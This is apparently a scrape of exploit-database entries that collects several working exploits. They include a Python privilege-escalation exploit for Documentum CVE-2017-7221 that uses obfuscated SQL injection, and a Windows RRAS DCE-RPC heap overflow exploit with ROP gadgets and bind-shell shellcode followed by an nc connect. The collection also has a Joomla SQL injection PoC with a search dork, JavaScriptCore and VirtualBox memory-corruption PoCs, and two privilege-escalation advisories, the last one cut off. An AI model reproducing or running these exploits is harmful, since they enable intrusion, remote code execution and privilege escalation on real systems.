[DM_METHOD_E_METHOD_ARGS_INVALID]error:
"The arguments being passed to the method 'dm_bp_transition' are
invalid:
arguments contain sql keywords which are not allowed."


New attack vector (note ALL keyword):

API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'

=================================>8================================


Recently I have noticed that latest versions of Documentum Content
Server are not affected by the PoC provided above, however all versions
of Documentum Content Server are still vulnerable because vendor incorrectly
implemented input validation: they convert arguments to lower/upper-case, 
replace line feed, carriage return and tab characters by a space, 
remove double spaces, after that they check where resulting string contains 
special keywords ('union ' and 'union all') or not - it is possible 
to use other whitespace characters like backspace, which is demonstrated
in the PoC.      


__

Regards,
Andrey B. Panfilov



CVE-2017-7221.py
'''

#!/usr/bin/env python

import socket
import sys
from os.path import basename

from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject

CIPHERS = "ALL:aNULL:!eNULL"


def usage():
    print "usage:\n\t%s host port user password" % basename(sys.argv[0])


def main():
    if len(sys.argv) != 5:
        usage()
        exit(1)

    (session, docbase) = create_session(*sys.argv[1:5])

    if is_super_user(session):
        print "Current user is a superuser, nothing to do"
        exit(1)

    install_owner = session.serverconfig['r_install_owner']
    document_id = session.next_id(0x08)
    content_id = session.next_id(0x06)

    store = session.get_by_qualification("dm_store")
    format = session.get_by_qualification("dm_format where name='crtext'")
    handle = session.make_pusher(store['r_object_id'])
    if handle < 1:
        print "Unable to create pusher"
        exit(1)

    data = "Public Function EntryCriteria(ByVal SessionId As String,_" \
           "\nByVal ObjectId As String,_" \
           "\nByVal UserName As String,_" \
           "\nByVal TargetState As String,_" \
           "\nByRef ErrorString As String) As Boolean" \
           "\nDim QueryID As String" \
           "\nDim Query As String" \
           "\nQuery = \"query,c,update dm_user objects set " \
           "user_privileges=16 where user_name=\'%s\'\"" \
           "\nQueryID = dmAPIGet(Query)" \
           "\nQueryID = dmAPIExec(\"commit,c\")" \
           "\nEntryCriteria=True" \
           "\nEnd Function" % (sys.argv[3])

    b = bytearray()
    b.extend(data)

    if not session.start_push(handle, content_id, format['r_object_id'], len(b)):
        print "Failed to start push"
        exit(1)

    session.upload(handle, b)
    data_ticket = session.end_push_v2(handle)['DATA_TICKET']

    procedure = False
    try:
        print "Trying to create dm_procedure"
        document = TypedObject(session=session)
        document.set_string("OBJECT_TYPE", "dm_procedure")
        document.set_bool("IS_NEW_OBJECT", True)
        document.set_int("i_vstamp", 0)
        document.set_int("world_permit", 7)
        document.set_string("object_name", "CVE-2014-2513")
        document.set_string("r_object_type", "dm_procedure")
        document.append_id("i_contents_id", content_id)
        document.set_int("r_page_cnt", 1)
        document.set_string("a_content_type", format['name'])
        document.set_bool("i_has_folder", True)
        document.set_bool("i_latest_flag", True)
        document.set_id("i_chronicle_id", document_id)
        document.append_string("r_version_label", ["1.0", "CURRENT"])
        document.set_int("r_content_size", len(b))
        if session.sys_obj_save(document_id, document):
            procedure = True
    except Exception, e:
        print str(e)

    if not procedure:
        print "Failed to create dm_procedure"
        print "Trying to create dm_sysobject"
        document = TypedObject(session=session)
        document.set_string("OBJECT_TYPE", "dm_sysobject")
        document.set_bool("IS_NEW_OBJECT", True)
        document.set_int("i_vstamp", 0)
        document.set_string("owner_name", sys.argv[3])
        document.set_int("world_permit", 7)
        document.set_string("object_name", "CVE-2017-7221")
        document.set_string("r_object_type", "dm_sysobject")
        document.append_id("i_contents_id", content_id)
        document.set_int("r_page_cnt", 1)
        document.set_string("a_content_type", format['name'])
        document.set_bool("i_has_folder", True)
        document.set_bool("i_latest_flag", True)
        document.set_id("i_chronicle_id", document_id)
        document.append_string("r_version_label", ["1.0", "CURRENT"])
        document.set_int("r_content_size", len(b))
        if not session.sys_obj_save(document_id, document):
            print "Failed to create dm_sysobject"
            exit(1)

    content = TypedObject(session=session)
    content.set_string("OBJECT_TYPE", "dmr_content")
    content.set_bool("IS_NEW_OBJECT", True)
    content.set_id("storage_id", store['r_object_id'])
    content.set_id("format", format['r_object_id'])
    content.set_int("data_ticket", data_ticket)
    content.set_id("parent_id", document_id)
    content.set_int("page", 0)
    content.set_string("full_format", format['name'])
    content.set_int("content_size", len(b))
    if not session.save_cont_attrs(content_id, content):
        print "Failed to create content"
        exit(1)

    if procedure:
        query = "execute do_method WITH METHOD='dm_bp_transition'," \
                " ARGUMENTS='%s %s %s \"\" 0000000000000000 " \
                "0000000000000000 0000000000000000 \"%s\" " \
                "0000000000000000  0000000000000000 0000000000000000 " \
                "\"\" 0 0 T F T T %s %s'" % \
                (docbase, docbase, install_owner, document_id,
                 install_owner, session.session)
    else:
        query = "execute do_method WITH METHOD='dm_bp_transition'," \
                " ARGUMENTS='%s %s %s \"\" 0000000000000000 " \
                "0000000000000000 0000000000000000 \"%s,'' " \
                "union\b select r_object_id from  dm_sysobject(all) where r_object_id=''%s\" " \
                "0000000000000000  0000000000000000 0000000000000000 " \
                "\"\" 0 0 T F T T %s %s'" % \
                (docbase, docbase, install_owner, document_id,
                 document_id, install_owner, session.session)

    session.query(query)

    r = session.query(
        "select user_privileges from dm_user "
        "where user_name=USER") \
        .next_record()['user_privileges']
    if r != 16:
        print "Failed"
        exit(1)
    print "P0wned!"


def create_session(host, port, user, pwd, identity=None):
    print "Trying to connect to %s:%s as %s ..." % \
          (host, port, user)
    session = None
    try:
        session = DocbaseClient(
            host=host, port=int(port),
            username=user, password=pwd,
            identity=identity)
    except socket.error, e:
        if e.errno == 54:
            session = DocbaseClient(
                host=host, port=int(port),
                username=user, password=pwd,
                identity=identity,
                secure=True, ciphers=CIPHERS)
        else:
            raise e
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)


def is_super_user(session):
    user = session.get_by_qualification(
        "dm_user WHERE user_name=USER")
    if user['user_privileges'] == 16:
        return True
    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    if group is not None:
        return True

    return False


if __name__ == '__main__':
    main()
HireHackking 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
##################################################################################
#   By Victor Portal (vportal) for educational porpouse only     
##################################################################################
#   This exploit is the python version of the ErraticGopher exploit probably     #
#   with some modifications. ErraticGopher exploits a memory corruption          #
#   (seems to be a Heap Overflow) in the Windows DCE-RPC Call MIBEntryGet.       #
#   Because the Magic bytes, the application redirects the execution to the      #
#   iprtrmgr.dll library, where a instruction REPS MOVS (0x641194f5) copy        #
#   all te injected stub from the heap to the stack, overwritten a return        #
#   address as well as the SEH handler stored in the Stack, being possible       # 
#   to control the execution flow to disable DEP and jump to the shellcode       #
#   as SYSTEM user.                                                              #
##################################################################################
#The exploit only works if target has the RRAS service enabled
#Tested on Windows Server 2003 SP2

import struct
import sys
import time
import os

from threading import Thread    
                                
from impacket import smb
from impacket import uuid
from impacket import dcerpc
from impacket.dcerpc.v5 import transport
                 
target = sys.argv[1]

print '[-]Initiating connection'
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
trans.connect()

print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
dce = trans.DCERPC_class(trans)
#RRAS DCE-RPC CALL
dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
egghunter += "\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
buf =  ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"

#NX disable routine for Windows Server 2003 SP2
rop = "\x30\xdb\xc0\x71" #push esp, pop ebp, retn ws_32.dll
rop += "\x45"*16
rop += "\xe9\x77\xc1\x77" #push esp, pop ebp, retn 4 gdi32.dll
rop += "\x5d\x7a\x81\x7c" #ret 20
rop += "\x71\x42\x38\x77" #jmp esp
rop += "\xf6\xe7\xbd\x77" #add esp,2c ; retn msvcrt.dll
rop += "\x90"*2 + egghunter + "\x90"*42
rop += "\x17\xf5\x83\x7c" #Disable NX routine
rop += "\x90"*4

stub = "\x21\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\x08\x00\x00\x00" #Magic bytes
stub += "\x41"*20 + rop + "\xCC"*100 + "w00tw00t" + buf + "\x42"*(1313-20-len(rop)-100-8-len(buf))
stub += "\x12" #Magic byte
stub += "\x46"*522
stub += "\x04\x00\x00\x00\x00\x00\x00\x00" #Magic bytes


dce.call(0x1d, stub)   #0x1d MIBEntryGet (vulnerable function)
print "[-]Exploit sent to target successfully..."

print "Waiting for shell..."
time.sleep(5)
os.system("nc " + target + " 4444")
HireHackking 
# Exploit Title: Joomla Component Myportfolio 3.0.2 - SQL Injection
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba Kazemi (Mojtaba MobhaM)
# Home : https://extensions.joomla.org/extensions/extension/directory-a-documentation/portfolio/myportfolio/
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Google Dork : inurl:index.php?option=com_myportfolio
# Tested on: Linux
# Date: 2017-04-24
 
# POC :
# pid Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?task=project&view=grid&id=1&pid=[SQL]&format=raw&option=com_myportfolio&Itemid=125
 
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian White Hat Hackers
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1095

There is an out-of-bounds memcpy in Array.concat that can lead to memory corruption.

In builtins/ArrayPrototype.js, the function concatSlowPath calls a native method @appendMemcpy with a parameter resultIndex that is handled unsafely by the method. It calls JSArray::appendMemcpy, which calculates the memory size for the combined arrays as follows:

unsigned newLength = startIndex + otherLength;

If startIndex (resultIndex from concatSlowPath in JS) is very large, an integer overflow can occur, causing too small a buffer to be allocated, and copying to occur outside of the buffer.

It should be difficult to reach this state without a long execution time, because an array of length resultIndex needs to be allocated and copied before resultIndex is incremented, however if both arrays involved in the concatenation are of type ArrayWithUndecided JSArray::appendMemcpy returns true without copying, and resultIndex can be incremented with a low execution time.

Arrays of type ArrayWithUndecided are usually of length 0, however, it is possible to create one by calling Array.splice on an array with all undefined elements. This will cause an undefined Array of the delete length to be allocated, and then returned without it being written to, which would cause it to decide its type.

A minimal PoC is as follows, and a full PoC is attached.

var a = [];
a.length = 0xffffff00;

var b = a.splice(0, 0x100000); // Undecided array

var args = [];
args.length = 4094;
args.fill(b);

var q = [];
q.length = 0x1000;
q.fill(7);

var c = a.splice(0, 0xfffef); //Shorter undecided array

args[4094] = c;
args[4095] = q;


b.concat.apply(b, args);
-->

<html>
<body>
<script>

var a = [];
a.length = 0xffffff00;

var b = a.splice(0, 0x100000); // Undecided array

var args = [];
args.length = 4094;
args.fill(b);

var q = [];
q.length = 0x1000;
q.fill(7);

var c = a.splice(0, 0xfffef); //Shorter undecided array

args[4094] = c;
args[4095] = q;


b.concat.apply(b, args);

</script>
</body>
</html>
HireHackking 
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1227

We have discovered a heap double-free vulnerability in the latest version of VirtualBox (5.1.18), with Guest Additions (and more specifically shared folders) enabled in the guest operating system. The heap memory corruption takes place in the VirtualBox.exe process running on a Windows host (other host platforms were untested). It can be triggered from an unprivileged ring-3 process running in a Windows guest, by performing two nt!NtQueryDirectoryFile system calls [1] against a shared (sub)directory one after another: the first one with the ReturnSingleEntry argument set to FALSE, and the next one with ReturnSingleEntry=TRUE. During the second system call, a double free takes place and the VM execution is aborted.

We have confirmed that the vulnerability reproduces with Windows 7/10 32-bit as the guest, and Windows 7 64-bit as the host system, but haven’t checked other configurations. However, it seems very likely that the specific version of Windows as the guest/host is irrelevant.

It also seems important for reproduction that the shared directory being queried has some files (preferably a few dozen) inside of it. The attached Proof of Concept program (written in C++, can be compiled with Microsoft Visual Studio) works by first creating a dedicated directory in the shared folder (called “vbox_crash”), and then creating 16 files with ~128 byte long names, which appears to be sufficient to always trigger the bug. Finally, it invokes the nt!NtQueryDirectoryFile syscall twice, leading to a VM crash. While the PoC requires write access to the shared folder to set up reliable conditions, it is probably not necessary in practical scenarios, as long as the shared folder already contains some files (which is most often the case).

If we assume that the shared folder is mounted as drive E, we can start the PoC as follows:

>VirtualBoxKiller.exe E:\

Immediately after pressing "enter", the virtual machine should be aborted. The last two lines of the VBoxHardening.log file corresponding to the VM should be similar to the following:

--- cut ---
  3e28.176c: supR3HardNtChildWaitFor[2]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468037 ms, the end);
  1020.3404: supR3HardNtChildWaitFor[1]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468638 ms, the end);
--- cut ---

The 0xc0000374 exit code above translates to STATUS_HEAP_CORRUPTION. A summary of the crash and the corresponding stack trace is as follows:

--- cut ---
  1: kd> g
  Critical error detected c0000374
  Break instruction exception - code 80000003 (first chance)
  ntdll!RtlReportCriticalFailure+0x2f:
  0033:00000000`76f3f22f cc              int     3

  1: kd> kb
  RetAddr           : Args to Child                                                           : Call Site
  00000000`76f3f846 : 00000000`00000002 00000000`00000023 00000000`00000087 00000000`00000003 : ntdll!RtlReportCriticalFailure+0x2f
  00000000`76f40412 : 00000000`00001010 00000000`03a50000 00000000`00001000 00000000`00001000 : ntdll!RtlpReportHeapFailure+0x26
  00000000`76f42084 : 00000000`03a50000 00000000`05687df0 00000000`00000000 00000000`038d0470 : ntdll!RtlpHeapHandleError+0x12
  00000000`76eda162 : 00000000`05687de0 00000000`00000000 00000000`00000000 000007fe`efc8388b : ntdll!RtlpLogHeapFailure+0xa4
  00000000`76d81a0a : 00000000`00000000 00000000`03f0e1b0 00000000`111fdd40 00000000`00000000 : ntdll!RtlFreeHeap+0x72
  00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`08edf790 00000000`05661c00 : kernel32!HeapFree+0xa
  000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`03f0e1b0 : MSVCR100!free+0x1c
  000007fe`f4613a96 : 00000000`05661d16 00000000`00000000 00000000`00000000 00000000`05687df0 : VBoxRT+0xc8fef
  000007fe`f4611a48 : 00000000`056676d0 00000000`08edf830 00000000`00000000 00000000`05661c98 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686
  000007fe`ee885c22 : 00000000`111fdd30 00000000`111fdd30 00000000`03f352b0 00000000`0000018c : VBoxSharedFolders+0x1a48
  000007fe`ee884a2c : 00000000`00000000 00000000`111fdd30 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62
  000007fe`efc13b2f : 00000000`05747fe0 00000000`00000da4 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x47a6c
  000007fe`efc91122 : 00000000`05737e90 00000000`05737e90 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f
  00000000`72561d9f : 00000000`05737e90 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122
  00000000`72561e3b : 00000000`725f2ac0 00000000`05737e90 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43
  00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf
  00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
  00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
--- cut ---

When the "Heaps" option is enabled for VirtualBox.exe in Application Verifier, the crash is reported in the following way:

--- cut ---
  1: kd> g

  =======================================
  VERIFIER STOP 0000000000000007: pid 0xC08: Heap block already freed. 

    000000000DCB1000 : Heap handle for the heap owning the block.
    000000001C37E000 : Heap block being freed again.
    0000000000000000 : Size of the heap block.
    0000000000000000 : Not used


  =======================================
  This verifier stop is not continuable. Process will be terminated 
  when you use the `go' debugger command.

  =======================================

  1: kd> kb
  RetAddr           : Args to Child                                                           : Call Site
  000007fe`f42437ee : 00000000`00000000 00000000`1c37e000 000007fe`f42415a8 000007fe`f42520b0 : ntdll!DbgBreakPoint
  000007fe`f4249970 : 00000000`265cf5b8 00000000`00000007 00000000`0dcb1000 00000000`1c37e000 : vrfcore!VerifierStopMessageEx+0x772
  000007fe`f302931d : 00000000`1c186a98 00000000`00000000 00000000`265cf520 00100000`265cf520 : vrfcore!VfCoreRedirectedStopMessage+0x94
  000007fe`f3026bc1 : 00000000`0dcb1000 00000000`1c37e000 00000000`00000000 00000000`0dcb1000 : verifier!AVrfpDphReportCorruptedBlock+0x155
  000007fe`f3026c6f : 00000000`0dcb1000 00000000`1c37e000 00000000`0dcb1000 00000000`00002000 : verifier!AVrfpDphFindBusyMemoryNoCheck+0x71
  000007fe`f3026e45 : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`1717ed08 : verifier!AVrfpDphFindBusyMemory+0x1f
  000007fe`f302870e : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`0dcb1038 : verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x25
  00000000`76f440d5 : 00000000`00000000 00000000`00000000 00000000`00001000 00000000`00000000 : verifier!AVrfDebugPageHeapFree+0x8a
  00000000`76ee796c : 00000000`0dcb0000 00000000`00000000 00000000`0dcb0000 00000000`00000000 : ntdll!RtlDebugFreeHeap+0x35
  00000000`76d81a0a : 00000000`0dcb0000 000007fe`efc41b01 00000000`00000000 00000000`1c37e000 : ntdll! ?? ::FNODOBFM::`string'+0xe982
  00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`265cfb10 00000000`1c341f00 : kernel32!HeapFree+0xa
  000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`67e40fe0 : MSVCR100!free+0x1c
  000007fe`f4923a96 : 00000000`1c342076 00000000`00000000 00000000`00000000 00000000`1c37e000 : VBoxRT+0xc8fef
  000007fe`f4921a48 : 00000000`5c774ff0 00000000`265cfbb0 00000000`00000000 00000000`1c341ff8 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686
  000007fe`ee595c22 : 00000000`63097f60 00000000`63097f60 00000000`25f81f30 00000000`0000018c : VBoxSharedFolders+0x1a48
  000007fe`ee594a2c : 00000000`00000000 00000000`63097f60 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62
  000007fe`efc13b2f : 00000000`25339730 00000000`000004c8 00000000`00000000 00000000`1dce4d30 : VBoxC!VBoxDriversRegister+0x47a6c
  000007fe`efc91122 : 00000000`1dce4d30 00000000`1dce4d30 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f
  00000000`72561d9f : 00000000`1dce4d30 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122
  00000000`72561e3b : 00000000`725f2ac0 00000000`1dce4d30 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43
  00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf
  00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
  00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
--- cut ---

Due to the nature of the flaw (heap memory corruption), it could potentially make it possible for an unprivileged guest program to escape the VM and execute arbitrary code on the host, hence we consider it to be a high-severity issue.

References:
[1] ZwQueryDirectoryFile routine, https://msdn.microsoft.com/en-us/library/windows/hardware/ff567047(v=vs.85).aspx
*/

#include <Windows.h>
#include <winternl.h>

#include <cstdio>
#include <time.h>

extern "C"
NTSTATUS WINAPI NtQueryDirectoryFile(
  _In_     HANDLE                 FileHandle,
  _In_opt_ HANDLE                 Event,
  _In_opt_ PIO_APC_ROUTINE        ApcRoutine,
  _In_opt_ PVOID                  ApcContext,
  _Out_    PIO_STATUS_BLOCK       IoStatusBlock,
  _Out_    PVOID                  FileInformation,
  _In_     ULONG                  Length,
  _In_     FILE_INFORMATION_CLASS FileInformationClass,
  _In_     BOOLEAN                ReturnSingleEntry,
  _In_opt_ PUNICODE_STRING        FileName,
  _In_     BOOLEAN                RestartScan
);

typedef struct _FILE_DIRECTORY_INFORMATION {
  ULONG         NextEntryOffset;
  ULONG         FileIndex;
  LARGE_INTEGER CreationTime;
  LARGE_INTEGER LastAccessTime;
  LARGE_INTEGER LastWriteTime;
  LARGE_INTEGER ChangeTime;
  LARGE_INTEGER EndOfFile;
  LARGE_INTEGER AllocationSize;
  ULONG         FileAttributes;
  ULONG         FileNameLength;
  WCHAR         FileName[1];
} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;

int main(int argc, char **argv) {
  // Validate command line format.
  if (argc != 2) {
    printf("Usage: %s <path to a writable shared folder>\n", argv[0]);
    return 1;
  }

  // Initialize the PRNG.
  srand((unsigned int)time(NULL));

  // Create a subdirectory dedicated to demonstrating the vulnerability.
  CHAR TmpDirectoryName[MAX_PATH];
  _snprintf_s(TmpDirectoryName, sizeof(TmpDirectoryName), "%s\\vbox_crash", argv[1]);

  if (!CreateDirectoryA(TmpDirectoryName, NULL) && GetLastError() != ERROR_ALREADY_EXISTS) {
    printf("CreateDirectory failed, %d\n", GetLastError());
    return 1;
  }

  // Create 16 files with long (128-byte) names, which appears to always be sufficient to trigger the bug.
  CONST UINT kTempFilesCount = 16;
  CONST UINT kTempFilenameLength = 128;
  CHAR TmpFilename[kTempFilenameLength + 1], TmpFilePath[MAX_PATH];

  memset(TmpFilename, 'A', kTempFilenameLength);
  TmpFilename[kTempFilenameLength] = '\0';

  for (UINT i = 0; i < kTempFilesCount; i++) {
    _snprintf_s(TmpFilePath, sizeof(TmpFilePath), "%s\\%s.%u", TmpDirectoryName, TmpFilename, rand());
    HANDLE hFile = CreateFileA(TmpFilePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
      printf("CreateFile#1 failed, %d\n", GetLastError());
      return 1;
    }

    CloseHandle(hFile);
  }
  
  // Open the temporary directory.
  HANDLE hDirectory = CreateFileA(TmpDirectoryName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
  if (hDirectory == INVALID_HANDLE_VALUE) {
    printf("CreateFile#2 failed, %d\n", GetLastError());
    return 1;
  }

  IO_STATUS_BLOCK iosb;
  FILE_DIRECTORY_INFORMATION fdi;

  // Perform the first call, with ReturnSingleEntry set to FALSE.
  NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, FALSE, NULL, TRUE);

  // Now make the same call, but with ReturnSingleEntry=TRUE. This should crash VirtualBox.exe on the host with a double-free exception.
  NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, TRUE, NULL, TRUE);

  // We should never reach here.
  CloseHandle(hDirectory);

  return 0;
}
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1075

Windows: Dolby Audio X2 Service Elevation of Privilege
Platform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 (on a Lenovo P50). Version of the service binary 0.7.2.61 built on 7/18/2016.
Class: Elevation of Privilege

Summary:
The DAX2API service installed as part of the Realtek Audio Driver on Windows 10 is vulnerable to a privilege escalation vulnerability which allows a normal user to get arbitrary system privileges.

Description:

The DAX2API service is a DCOM service written in .NET running at system privileges. The use of .NET for DCOM is inherently unsafe and should not be used. There’s public exploit code to elevate privileges on arbitrary services available at https://github.com/tyranid/ExploitDotNetDCOM.

Microsoft recommends moving from using DCOM to WCF for .NET services of different privilege levels. See https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/ for more information.

Proof of Concept:

To demonstrate the vulnerability download the project https://github.com/tyranid/ExploitDotNetDCOM and compile using Visual Studio. The executable to use is ExploitDotNetDCOMSerialization.exe.

1) From a command prompt run the command “ExploitDotNetDCOMSerialization.exe 6A28A945-790C-4B68-B0F4-34EEB1626EE3 notepad” 
2) Check the currently running processes for the privileged copy of notepad,

Expected Result:
No privilege escalation occurs.

Observed Result:
An instance of notepad is running at system privileges.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41933.zip
HireHackking 
Source: https://www.securify.nl/advisory/SFY20170402/multiple_local_privilege_escalation_vulnerabilities_in_hidemyass_pro_vpn_client_v2_x_for_os_x.html

Abstract
Multiple local privilege escalation vulnerabilities were found in the helper binary HMAHelper that ships with HideMyAss Pro VPN for OS X. The helper is installed setuid root and responsible for loading Kernel Extensions (kext) and managing VPN firewall rules. These issues can be leveraged by a local attacker to gain elevated (root) privileges.


Tested versions:
This issue was tested on HMA Pro VPN version 2.2.7.0 for OS X


Fix:
HMA Support has reported that this issue will not be fixed. Version 2.2.7.0. is still available for download and was earlier this year also available in the Mac App Store. It seems that this version is still available for older versions of OS X (OS X 10.7 - 10.11).

It should be noted the latest version of HMA Pro VPN for OS X (version 3.3.0.3) is vulnerable to a similar local privilege escalation issue that is also not fixed at the time of writing.


Introduction:
HideMyAss is a popular VPN service that allows users to hide their identity and browse anonymously online. HideMyAss also provides applications to setup the VPN connections, including a client for OS X. It was discovered that version 2.x of HMA Pro VPN for OS X is affected by multiple local privilege escalation vulnerabilities.


Details:
The helper binary HMAHelper that ships with HMA Pro VPN for OS X is installed as setuid root. The helper has the ability to execute several commands as root, including running kernal extentions (kext) but also enabling and disabling security firewall rules.

Although disabling the firewall is dangerous enough, it was found that the helper is affected by multiple local privilege escalation vulnerabilities. Taking the FirewallDisable rule as an example, the code snippet below shows that there is no limit to which executable can be executed allowing a local user (or malware) to run any executable as root.

Privax.OSX.HMA.Helper.FirewallManager 
private static void FirewallDisableSelected(string path, string args, string processNames)
{
   using (Process process = new Process())
   {
      ProcessStartInfo startInfo = process.StartInfo;
      startInfo.FileName = "/usr/bin/sudo";
